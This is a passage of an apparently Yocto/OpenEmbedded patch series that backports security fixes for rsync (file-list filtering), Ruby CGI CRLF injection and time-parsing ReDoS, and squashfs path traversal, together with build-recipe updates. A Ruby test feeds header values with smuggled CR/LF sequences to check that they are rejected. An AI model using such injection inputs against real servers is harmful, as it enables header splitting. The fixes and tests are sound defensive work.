47 filter_rule_list cvs_filter_list = { .debug_type = " [global CVS]" };
48 filter_rule_list daemon_filter_list = { .debug_type = " [daemon]" };
49+filter_rule_list implied_filter_list = { .debug_type = " [implied]" };
50
51 int saw_xattr_filter = 0;
52+int trust_sender_filter = 0;
53
54 /* Need room enough for ":MODS " prefix plus some room to grow. */
55 #define MAX_RULE_PREFIX (16)
56@@ -293,6 +300,123 @@ static void add_rule(filter_rule_list *listp, const char *pat, unsigned int pat_
57 }
58 }
59
60+/* Each arg the client sends to the remote sender turns into an implied include
61+ * that the receiver uses to validate the file list from the sender. */
62+void add_implied_include(const char *arg)
63+{
64+ filter_rule *rule;
65+ int arg_len, saw_wild = 0, backslash_cnt = 0;
66+ int slash_cnt = 1; /* We know we're adding a leading slash. */
67+ const char *cp;
68+ char *p;
69+ if (relative_paths) {
70+ cp = strstr(arg, "/./");
71+ if (cp)
72+ arg = cp+3;
73+ } else {
74+ if ((cp = strrchr(arg, '/')) != NULL)
75+ arg = cp + 1;
76+ }
77+ arg_len = strlen(arg);
78+ if (arg_len) {
79+ if (strpbrk(arg, "*[?")) {
80+ /* We need to add room to escape backslashes if wildcard chars are present. */
81+ cp = arg;
82+ while ((cp = strchr(cp, '\\')) != NULL) {
83+ arg_len++;
84+ cp++;
85+ }
86+ saw_wild = 1;
87+ }
88+ arg_len++; /* Leave room for the prefixed slash */
89+ rule = new0(filter_rule);
90+ if (!implied_filter_list.head)
91+ implied_filter_list.head = implied_filter_list.tail = rule;
92+ else {
93+ rule->next = implied_filter_list.head;
94+ implied_filter_list.head = rule;
95+ }
96+ rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
97+ p = rule->pattern = new_array(char, arg_len + 1);
98+ *p++ = '/';
99+ cp = arg;
100+ while (*cp) {
101+ switch (*cp) {
102+ case '\\':
103+ backslash_cnt++;
104+ if (saw_wild)
105+ *p++ = '\\';
106+ *p++ = *cp++;
107+ break;
108+ case '/':
109+ if (p[-1] == '/') /* This is safe because of the initial slash. */
110+ break;
111+ if (relative_paths) {
112+ filter_rule const *ent;
113+ int found = 0;
114+ *p = '\0';
115+ for (ent = implied_filter_list.head; ent; ent = ent->next) {
116+ if (ent != rule && strcmp(ent->pattern, rule->pattern) == 0)
117+ found = 1;
118+ }
119+ if (!found) {
120+ filter_rule *R_rule = new0(filter_rule);
121+ R_rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
122+ R_rule->pattern = strdup(rule->pattern);
123+ R_rule->u.slash_cnt = slash_cnt;
124+ R_rule->next = implied_filter_list.head;
125+ implied_filter_list.head = R_rule;
126+ }
127+ }
128+ slash_cnt++;
129+ *p++ = *cp++;
130+ break;
131+ default:
132+ *p++ = *cp++;
133+ break;
134+ }
135+ }
136+ *p = '\0';
137+ rule->u.slash_cnt = slash_cnt;
138+ arg = (const char *)rule->pattern;
139+ }
140+
141+ if (recurse || xfer_dirs) {
142+ /* Now create a rule with an added "/" & "**" or "*" at the end */
143+ rule = new0(filter_rule);
144+ if (recurse)
145+ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD | FILTRULE_WILD2;
146+ else
147+ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD;
148+ /* A +4 in the len leaves enough room for / * * \0 or / * \0 \0 */
149+ if (!saw_wild && backslash_cnt) {
150+ /* We are appending a wildcard, so now the backslashes need to be escaped. */
151+ p = rule->pattern = new_array(char, arg_len + backslash_cnt + 3 + 1);
152+ cp = arg;
153+ while (*cp) {
154+ if (*cp == '\\')
155+ *p++ = '\\';
156+ *p++ = *cp++;
157+ }
158+ } else {
159+ p = rule->pattern = new_array(char, arg_len + 3 + 1);
160+ if (arg_len) {
161+ memcpy(p, arg, arg_len);
162+ p += arg_len;
163+ }
164+ }
165+ if (p[-1] != '/')
166+ *p++ = '/';
167+ *p++ = '*';
168+ if (recurse)
169+ *p++ = '*';
170+ *p = '\0';
171+ rule->u.slash_cnt = slash_cnt + 1;
172+ rule->next = implied_filter_list.head;
173+ implied_filter_list.head = rule;
174+ }
175+}
176+
177 /* This frees any non-inherited items, leaving just inherited items on the list. */
178 static void pop_filter_list(filter_rule_list *listp)
179 {
180@@ -721,7 +845,7 @@ static void report_filter_result(enum logcode code, char const *name,
181 : name_flags & NAME_IS_DIR ? "directory"
182 : "file";
183 rprintf(code, "[%s] %sing %s %s because of pattern %s%s%s\n",
184- w, actions[*w!='s'][!(ent->rflags & FILTRULE_INCLUDE)],
185+ w, actions[*w=='g'][!(ent->rflags & FILTRULE_INCLUDE)],
186 t, name, ent->pattern,
187 ent->rflags & FILTRULE_DIRECTORY ? "/" : "", type);
188 }
189@@ -894,6 +1018,7 @@ static filter_rule *parse_rule_tok(const char **rulestr_ptr,
190 }
191 switch (ch) {
192 case ':':
193+ trust_sender_filter = 1;
194 rule->rflags |= FILTRULE_PERDIR_MERGE
195 | FILTRULE_FINISH_SETUP;
196 /* FALL THROUGH */
197diff --git a/flist.c b/flist.c
198index 499440c..630d685 100644
199--- a/flist.c
200+++ b/flist.c
201@@ -70,6 +70,7 @@ extern int need_unsorted_flist;
202 extern int sender_symlink_iconv;
203 extern int output_needs_newline;
204 extern int sender_keeps_checksum;
205+extern int trust_sender_filter;
206 extern int unsort_ndx;
207 extern uid_t our_uid;
208 extern struct stats stats;
209@@ -80,8 +81,7 @@ extern char curr_dir[MAXPATHLEN];
210
211 extern struct chmod_mode_struct *chmod_modes;
212
213-extern filter_rule_list filter_list;
214-extern filter_rule_list daemon_filter_list;
215+extern filter_rule_list filter_list, implied_filter_list, daemon_filter_list;
216
217 #ifdef ICONV_OPTION
218 extern int filesfrom_convert;
219@@ -904,6 +904,19 @@ static struct file_struct *recv_file_entry(int f, struct file_list *flist, int x
220 exit_cleanup(RERR_UNSUPPORTED);
221 }
222
223+ if (*thisname != '.' || thisname[1] != '\0') {
224+ int filt_flags = S_ISDIR(mode) ? NAME_IS_DIR : NAME_IS_FILE;
225+ if (!trust_sender_filter /* a per-dir filter rule means we must trust the sender's filtering */
226+ && filter_list.head && check_filter(&filter_list, FINFO, thisname, filt_flags) < 0) {
227+ rprintf(FERROR, "ERROR: rejecting excluded file-list name: %s\n", thisname);
228+ exit_cleanup(RERR_PROTOCOL);
229+ }
230+ if (implied_filter_list.head && check_filter(&implied_filter_list, FINFO, thisname, filt_flags) <= 0) {
231+ rprintf(FERROR, "ERROR: rejecting unrequested file-list name: %s\n", thisname);
232+ exit_cleanup(RERR_PROTOCOL);
233+ }
234+ }
235+
236 if (inc_recurse && S_ISDIR(mode)) {
237 if (one_file_system) {
238 /* Room to save the dir's device for -x */
239diff --git a/io.c b/io.c
240index c04dbd5..698a7da 100644
241--- a/io.c
242+++ b/io.c
243@@ -415,6 +415,7 @@ static void forward_filesfrom_data(void)
244 while (s != eob) {
245 if (*s++ == '\0') {
246 ff_xb.len = s - sob - 1;
247+ add_implied_include(sob);
248 if (iconvbufs(ic_send, &ff_xb, &iobuf.out, flags) < 0)
249 exit_cleanup(RERR_PROTOCOL); /* impossible? */
250 write_buf(iobuf.out_fd, s-1, 1); /* Send the '\0'. */
251@@ -446,9 +447,12 @@ static void forward_filesfrom_data(void)
252 char *f = ff_xb.buf + ff_xb.pos;
253 char *t = ff_xb.buf;
254 char *eob = f + len;
255+ char *cur = t;
256 /* Eliminate any multi-'\0' runs. */
257 while (f != eob) {
258 if (!(*t++ = *f++)) {
259+ add_implied_include(cur);
260+ cur = t;
261 while (f != eob && *f == '\0')
262 f++;
263 }
264diff --git a/main.c b/main.c
265index ee9630f..6ec56e7 100644
266--- a/main.c
267+++ b/main.c
268@@ -78,6 +78,7 @@ extern BOOL flist_receiving_enabled;
269 extern BOOL shutting_down;
270 extern int backup_dir_len;
271 extern int basis_dir_cnt;
272+extern int trust_sender_filter;
273 extern struct stats stats;
274 extern char *stdout_format;
275 extern char *logfile_format;
276@@ -93,7 +94,7 @@ extern char curr_dir[MAXPATHLEN];
277 extern char backup_dir_buf[MAXPATHLEN];
278 extern char *basis_dir[MAX_BASIS_DIRS+1];
279 extern struct file_list *first_flist;
280-extern filter_rule_list daemon_filter_list;
281+extern filter_rule_list daemon_filter_list, implied_filter_list;
282
283 uid_t our_uid;
284 gid_t our_gid;
285@@ -534,6 +535,7 @@ static pid_t do_cmd(char *cmd, char *machine, char *user, char **remote_argv, in
286 #ifdef ICONV_CONST
287 setup_iconv();
288 #endif
289+ trust_sender_filter = 1;
290 } else if (local_server) {
291 /* If the user didn't request --[no-]whole-file, force
292 * it on, but only if we're not batch processing. */
293@@ -1358,6 +1360,8 @@ static int start_client(int argc, char *argv[])
294 char *dummy_host;
295 int dummy_port = rsync_port;
296 int i;
297+ if (filesfrom_fd < 0)
298+ add_implied_include(remote_argv[0]);
299 /* For remote source, any extra source args must have either
300 * the same hostname or an empty hostname. */
301 for (i = 1; i < remote_argc; i++) {
302@@ -1381,6 +1385,7 @@ static int start_client(int argc, char *argv[])
303 if (!rsync_port && !*arg) /* Turn an empty arg into a dot dir. */
304 arg = ".";
305 remote_argv[i] = arg;
306+ add_implied_include(arg);
307 }
308 }
309
310diff --git a/receiver.c b/receiver.c
311index d6a48f1..c0aa893 100644
312--- a/receiver.c
313+++ b/receiver.c
314@@ -577,10 +577,13 @@ int recv_files(int f_in, int f_out, char *local_name)
315 if (DEBUG_GTE(RECV, 1))
316 rprintf(FINFO, "recv_files(%s)\n", fname);
317
318- if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')
319- && check_filter(&daemon_filter_list, FLOG, fname, 0) < 0) {
320- rprintf(FERROR, "attempt to hack rsync failed.\n");
321- exit_cleanup(RERR_PROTOCOL);
322+ if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')) {
323+ int filt_flags = S_ISDIR(file->mode) ? NAME_IS_DIR : NAME_IS_FILE;
324+ if (check_filter(&daemon_filter_list, FLOG, fname, filt_flags) < 0) {
325+ rprintf(FERROR, "ERROR: rejecting file transfer request for daemon excluded file: %s\n",
326+ fname);
327+ exit_cleanup(RERR_PROTOCOL);
328+ }
329 }
330
331 #ifdef SUPPORT_XATTRS
332--
3332.30.2
334
diff --git a/meta/recipes-devtools/rsync/rsync_3.1.3.bb b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
index 152ff02a25..c744503227 100644
--- a/meta/recipes-devtools/rsync/rsync_3.1.3.bb
+++ b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
@@ -1,5 +1,6 @@
1SUMMARY = "File synchronization tool" 1SUMMARY = "File synchronization tool"
2HOMEPAGE = "http://rsync.samba.org/" 2HOMEPAGE = "http://rsync.samba.org/"
3DESCRIPTION = "rsync is an open source utility that provides fast incremental file transfer."
3BUGTRACKER = "http://rsync.samba.org/bugzilla.html" 4BUGTRACKER = "http://rsync.samba.org/bugzilla.html"
4SECTION = "console/network" 5SECTION = "console/network"
5# GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0) 6# GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0)
@@ -15,6 +16,8 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/src/${BP}.tar.gz \
15 file://CVE-2016-9841.patch \ 16 file://CVE-2016-9841.patch \
16 file://CVE-2016-9842.patch \ 17 file://CVE-2016-9842.patch \
17 file://CVE-2016-9843.patch \ 18 file://CVE-2016-9843.patch \
19 file://CVE-2022-29154.patch \
20 file://0001-Fix-relative-when-copying-an-absolute-path.patch \
18" 21"
19 22
20SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf" 23SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf"
diff --git a/meta/recipes-devtools/ruby/ruby.inc b/meta/recipes-devtools/ruby/ruby.inc
index 7b6d4edc61..a9f4240932 100644
--- a/meta/recipes-devtools/ruby/ruby.inc
+++ b/meta/recipes-devtools/ruby/ruby.inc
@@ -14,8 +14,8 @@ LIC_FILES_CHKSUM = "\
14 file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \ 14 file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \
15" 15"
16 16
17DEPENDS = "ruby-native zlib openssl libyaml gdbm readline libffi" 17DEPENDS = "zlib openssl libyaml gdbm readline libffi"
18DEPENDS_class-native = "openssl-native libyaml-native readline-native zlib-native" 18DEPENDS_append_class-target = " ruby-native"
19 19
20SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}" 20SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}"
21SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \ 21SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch b/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
deleted file mode 100644
index 1abcb7547e..0000000000
--- a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
+++ /dev/null
@@ -1,40 +0,0 @@
1From 8946bb38b4d87549f0d99ed73c62c41933f97cc7 Mon Sep 17 00:00:00 2001
2From: Yusuke Endoh <mame@ruby-lang.org>
3Date: Tue, 29 Sep 2020 13:15:58 +0900
4Subject: [PATCH] Make it more strict to interpret some headers
5
6Some regexps were too tolerant.
7
8Upstream-Status: Backport
9[https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7]
10CVE: CVE-2020-25613
11Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
12---
13 lib/webrick/httprequest.rb | 6 +++---
14 1 file changed, 3 insertions(+), 3 deletions(-)
15
16diff --git a/lib/webrick/httprequest.rb b/lib/webrick/httprequest.rb
17index 294bd91..d34eac7 100644
18--- a/lib/webrick/httprequest.rb
19+++ b/lib/webrick/httprequest.rb
20@@ -227,9 +227,9 @@ def parse(socket=nil)
21 raise HTTPStatus::BadRequest, "bad URI `#{@unparsed_uri}'."
22 end
23
24- if /close/io =~ self["connection"]
25+ if /\Aclose\z/io =~ self["connection"]
26 @keep_alive = false
27- elsif /keep-alive/io =~ self["connection"]
28+ elsif /\Akeep-alive\z/io =~ self["connection"]
29 @keep_alive = true
30 elsif @http_version < "1.1"
31 @keep_alive = false
32@@ -508,7 +508,7 @@ def read_body(socket, block)
33 return unless socket
34 if tc = self['transfer-encoding']
35 case tc
36- when /chunked/io then read_chunked(socket, block)
37+ when /\Achunked\z/io then read_chunked(socket, block)
38 else raise HTTPStatus::NotImplemented, "Transfer-Encoding: #{tc}."
39 end
40 elsif self['content-length'] || @remaining_size
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
new file mode 100644
index 0000000000..cc2f9853db
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
@@ -0,0 +1,139 @@
1From 64c5045c0a6b84fdb938a8465a0890e5f7162708 Mon Sep 17 00:00:00 2001
2From: Yusuke Endoh <mame@ruby-lang.org>
3Date: Tue, 22 Nov 2022 10:49:27 +0900
4Subject: [PATCH] Prevent CRLF injection
5
6Throw a RuntimeError if the HTTP response header contains CR or LF to
7prevent HTTP response splitting.
8
9https://hackerone.com/reports/1204695
10
11Upstream-Status: Backport [https://github.com/ruby/cgi/commit/64c5045c0a6b84fdb938a8465a0890e5f7162708]
12CVE: CVE-2021-33621
13Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
14---
15 lib/cgi/core.rb | 45 +++++++++++++++++++++++--------------
16 test/cgi/test_cgi_header.rb | 8 +++++++
17 2 files changed, 36 insertions(+), 17 deletions(-)
18
19diff --git a/lib/cgi/core.rb b/lib/cgi/core.rb
20index bec76e0..62e6068 100644
21--- a/lib/cgi/core.rb
22+++ b/lib/cgi/core.rb
23@@ -188,17 +188,28 @@ class CGI
24 # Using #header with the HTML5 tag maker will create a <header> element.
25 alias :header :http_header
26
27+ def _no_crlf_check(str)
28+ if str
29+ str = str.to_s
30+ raise "A HTTP status or header field must not include CR and LF" if str =~ /[\r\n]/
31+ str
32+ else
33+ nil
34+ end
35+ end
36+ private :_no_crlf_check
37+
38 def _header_for_string(content_type) #:nodoc:
39 buf = ''.dup
40 if nph?()
41- buf << "#{$CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'} 200 OK#{EOL}"
42+ buf << "#{_no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'} 200 OK#{EOL}"
43 buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
44- buf << "Server: #{$CGI_ENV['SERVER_SOFTWARE']}#{EOL}"
45+ buf << "Server: #{_no_crlf_check($CGI_ENV['SERVER_SOFTWARE'])}#{EOL}"
46 buf << "Connection: close#{EOL}"
47 end
48- buf << "Content-Type: #{content_type}#{EOL}"
49+ buf << "Content-Type: #{_no_crlf_check(content_type)}#{EOL}"
50 if @output_cookies
51- @output_cookies.each {|cookie| buf << "Set-Cookie: #{cookie}#{EOL}" }
52+ @output_cookies.each {|cookie| buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}" }
53 end
54 return buf
55 end # _header_for_string
56@@ -213,9 +224,9 @@ class CGI
57 ## NPH
58 options.delete('nph') if defined?(MOD_RUBY)
59 if options.delete('nph') || nph?()
60- protocol = $CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'
61+ protocol = _no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'
62 status = options.delete('status')
63- status = HTTP_STATUS[status] || status || '200 OK'
64+ status = HTTP_STATUS[status] || _no_crlf_check(status) || '200 OK'
65 buf << "#{protocol} #{status}#{EOL}"
66 buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
67 options['server'] ||= $CGI_ENV['SERVER_SOFTWARE'] || ''
68@@ -223,38 +234,38 @@ class CGI
69 end
70 ## common headers
71 status = options.delete('status')
72- buf << "Status: #{HTTP_STATUS[status] || status}#{EOL}" if status
73+ buf << "Status: #{HTTP_STATUS[status] || _no_crlf_check(status)}#{EOL}" if status
74 server = options.delete('server')
75- buf << "Server: #{server}#{EOL}" if server
76+ buf << "Server: #{_no_crlf_check(server)}#{EOL}" if server
77 connection = options.delete('connection')
78- buf << "Connection: #{connection}#{EOL}" if connection
79+ buf << "Connection: #{_no_crlf_check(connection)}#{EOL}" if connection
80 type = options.delete('type')
81- buf << "Content-Type: #{type}#{EOL}" #if type
82+ buf << "Content-Type: #{_no_crlf_check(type)}#{EOL}" #if type
83 length = options.delete('length')
84- buf << "Content-Length: #{length}#{EOL}" if length
85+ buf << "Content-Length: #{_no_crlf_check(length)}#{EOL}" if length
86 language = options.delete('language')
87- buf << "Content-Language: #{language}#{EOL}" if language
88+ buf << "Content-Language: #{_no_crlf_check(language)}#{EOL}" if language
89 expires = options.delete('expires')
90 buf << "Expires: #{CGI.rfc1123_date(expires)}#{EOL}" if expires
91 ## cookie
92 if cookie = options.delete('cookie')
93 case cookie
94 when String, Cookie
95- buf << "Set-Cookie: #{cookie}#{EOL}"
96+ buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}"
97 when Array
98 arr = cookie
99- arr.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
100+ arr.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
101 when Hash
102 hash = cookie
103- hash.each_value {|c| buf << "Set-Cookie: #{c}#{EOL}" }
104+ hash.each_value {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
105 end
106 end
107 if @output_cookies
108- @output_cookies.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
109+ @output_cookies.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
110 end
111 ## other headers
112 options.each do |key, value|
113- buf << "#{key}: #{value}#{EOL}"
114+ buf << "#{_no_crlf_check(key)}: #{_no_crlf_check(value)}#{EOL}"
115 end
116 return buf
117 end # _header_for_hash
118diff --git a/test/cgi/test_cgi_header.rb b/test/cgi/test_cgi_header.rb
119index bab2d03..ec2f4de 100644
120--- a/test/cgi/test_cgi_header.rb
121+++ b/test/cgi/test_cgi_header.rb
122@@ -176,6 +176,14 @@ class CGIHeaderTest < Test::Unit::TestCase
123 end
124
125
126+ def test_cgi_http_header_crlf_injection
127+ cgi = CGI.new
128+ assert_raise(RuntimeError) { cgi.http_header("text/xhtml\r\nBOO") }
129+ assert_raise(RuntimeError) { cgi.http_header("type" => "text/xhtml\r\nBOO") }
130+ assert_raise(RuntimeError) { cgi.http_header("status" => "200 OK\r\nBOO") }
131+ assert_raise(RuntimeError) { cgi.http_header("location" => "text/xhtml\r\nBOO") }
132+ end
133+
134
135 instance_methods.each do |method|
136 private method if method =~ /^test_(.*)/ && $1 != ENV['TEST']
137--
1382.25.1
139
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
new file mode 100644
index 0000000000..c25a147d36
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
@@ -0,0 +1,61 @@
1From 957bb7cb81995f26c671afce0ee50a5c660e540e Mon Sep 17 00:00:00 2001
2From: Hiroshi SHIBATA <hsbt@ruby-lang.org>
3Date: Wed, 29 Mar 2023 13:28:25 +0900
4Subject: [PATCH] CVE-2023-28756
5
6CVE: CVE-2023-28756
7Upstream-Status: Backport [https://github.com/ruby/ruby/commit/957bb7cb81995f26c671afce0ee50a5c660e540e]
8
9Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
10---
11 lib/time.rb | 6 +++---
12 test/test_time.rb | 9 +++++++++
13 2 files changed, 12 insertions(+), 3 deletions(-)
14
15diff --git a/lib/time.rb b/lib/time.rb
16index f27bacd..4a86e8e 100644
17--- a/lib/time.rb
18+++ b/lib/time.rb
19@@ -501,8 +501,8 @@ class Time
20 (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+
21 (\d{2,})\s+
22 (\d{2})\s*
23- :\s*(\d{2})\s*
24- (?::\s*(\d{2}))?\s+
25+ :\s*(\d{2})
26+ (?:\s*:\s*(\d\d))?\s+
27 ([+-]\d{4}|
28 UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date
29 # Since RFC 2822 permit comments, the regexp has no right anchor.
30@@ -717,7 +717,7 @@ class Time
31 #
32 # If self is a UTC time, Z is used as TZD. [+-]hh:mm is used otherwise.
33 #
34- # +fractional_digits+ specifies a number of digits to use for fractional
35+ # +fraction_digits+ specifies a number of digits to use for fractional
36 # seconds. Its default value is 0.
37 #
38 # require 'time'
39diff --git a/test/test_time.rb b/test/test_time.rb
40index ca20788..4f11048 100644
41--- a/test/test_time.rb
42+++ b/test/test_time.rb
43@@ -62,6 +62,15 @@ class TestTimeExtension < Test::Unit::TestCase # :nodoc:
44 assert_equal(true, t.utc?)
45 end
46
47+ def test_rfc2822_nonlinear
48+ pre = ->(n) {"0 Feb 00 00 :00" + " " * n}
49+ assert_linear_performance([100, 500, 5000, 50_000], pre: pre) do |s|
50+ assert_raise(ArgumentError) do
51+ Time.rfc2822(s)
52+ end
53+ end
54+ end
55+
56 def test_encode_rfc2822
57 t = Time.utc(1)
58 assert_equal("Mon, 01 Jan 0001 00:00:00 -0000", t.rfc2822)
59--
602.25.1
61
diff --git a/meta/recipes-devtools/ruby/ruby_2.7.1.bb b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
index a6c65e887b..7e6373bd24 100644
--- a/meta/recipes-devtools/ruby/ruby_2.7.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
@@ -6,12 +6,17 @@ SRC_URI += " \
6 file://remove_has_include_macros.patch \ 6 file://remove_has_include_macros.patch \
7 file://run-ptest \ 7 file://run-ptest \
8 file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \ 8 file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \
9 file://CVE-2020-25613.patch \
10 file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \ 9 file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
10 file://CVE-2023-28756.patch \
11 file://CVE-2021-33621.patch \
11 " 12 "
12 13
13SRC_URI[md5sum] = "debb9c325bf65021214451660f46e909" 14SRC_URI[md5sum] = "f972fb0cce662966bec10d5c5f32d042"
14SRC_URI[sha256sum] = "d418483bdd0000576c1370571121a6eb24582116db0b7bb2005e90e250eae418" 15SRC_URI[sha256sum] = "e7203b0cc09442ed2c08936d483f8ac140ec1c72e37bb5c401646b7866cb5d10"
16
17# CVE-2021-28966 is Windows specific and not affects Linux OS
18# https://security-tracker.debian.org/tracker/CVE-2021-28966
19CVE_CHECK_WHITELIST += "CVE-2021-28966"
15 20
16PACKAGECONFIG ??= "" 21PACKAGECONFIG ??= ""
17PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}" 22PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
index f84a7e18c8..95dccb9cae 100755
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
@@ -72,12 +72,12 @@ exec_postinst_scriptlets() {
72 else 72 else
73 echo "ERROR: postinst $i failed." 73 echo "ERROR: postinst $i failed."
74 [ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log 74 [ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log
75 remove_pi_dir=0 75 remove_rcsd_link=0
76 fi 76 fi
77 done 77 done
78} 78}
79 79
80remove_pi_dir=1 80remove_rcsd_link=1
81if $pm_installed; then 81if $pm_installed; then
82 case $pm in 82 case $pm in
83 "ipk") 83 "ipk")
@@ -92,9 +92,7 @@ else
92 exec_postinst_scriptlets 92 exec_postinst_scriptlets
93fi 93fi
94 94
95# since all postinstalls executed successfully, remove the postinstalls directory 95# since all postinstalls executed successfully, remove the rcS.d link
96# and the rcS.d link 96if [ $remove_rcsd_link = 1 ]; then
97if [ $remove_pi_dir = 1 ]; then
98 rm -rf $pi_dir
99 remove_rcsd_link 97 remove_rcsd_link
100fi 98fi
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
index 7f72f3388a..b6b81d5c1a 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
@@ -1,7 +1,7 @@
1[Unit] 1[Unit]
2Description=Run pending postinsts 2Description=Run pending postinsts
3DefaultDependencies=no 3DefaultDependencies=no
4After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount 4After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount ldconfig.service
5Before=sysinit.target 5Before=sysinit.target
6 6
7[Service] 7[Service]
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
index 85b3fc867e..c353d4b79c 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Runs postinstall scripts on first boot of the target device" 1SUMMARY = "Runs postinstall scripts on first boot of the target device"
2DESCRIPTION = "${SUMMARY}"
2SECTION = "devel" 3SECTION = "devel"
3PR = "r10" 4PR = "r10"
4LICENSE = "MIT" 5LICENSE = "MIT"
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 0000000000..95e2534ee4
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
1Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c
2for compatible.
3
4Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
5CVE: CVE-2021-40153
6
7Signed-off-by: Kai Kang <kai.kang@windriver.com>
8
9From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
10From: Phillip Lougher <phillip@squashfs.org.uk>
11Date: Sat, 16 Jan 2021 20:08:55 +0000
12Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
13
14An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
15shows how some specially crafted Squashfs filesystems containing
16invalid file names (with '/' and ..) can cause Unsquashfs to write
17files outside of the destination directory.
18
19This commit fixes this exploit by checking all names for
20validity.
21
22In doing so I have also added checks for '.' and for names that
23are shorter than they should be (names in the file system should
24not have '\0' terminators).
25
26Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
27---
28 squashfs-tools/Makefile | 5 ++-
29 squashfs-tools/unsquash-1.c | 9 +++++-
30 squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
31 squashfs-tools/unsquash-2.c | 9 +++++-
32 squashfs-tools/unsquash-3.c | 9 +++++-
33 squashfs-tools/unsquash-4.c | 9 +++++-
34 squashfs-tools/unsquashfs.h | 5 ++-
35 7 files changed, 98 insertions(+), 6 deletions(-)
36 create mode 100644 squashfs-tools/unsquash-1234.c
37
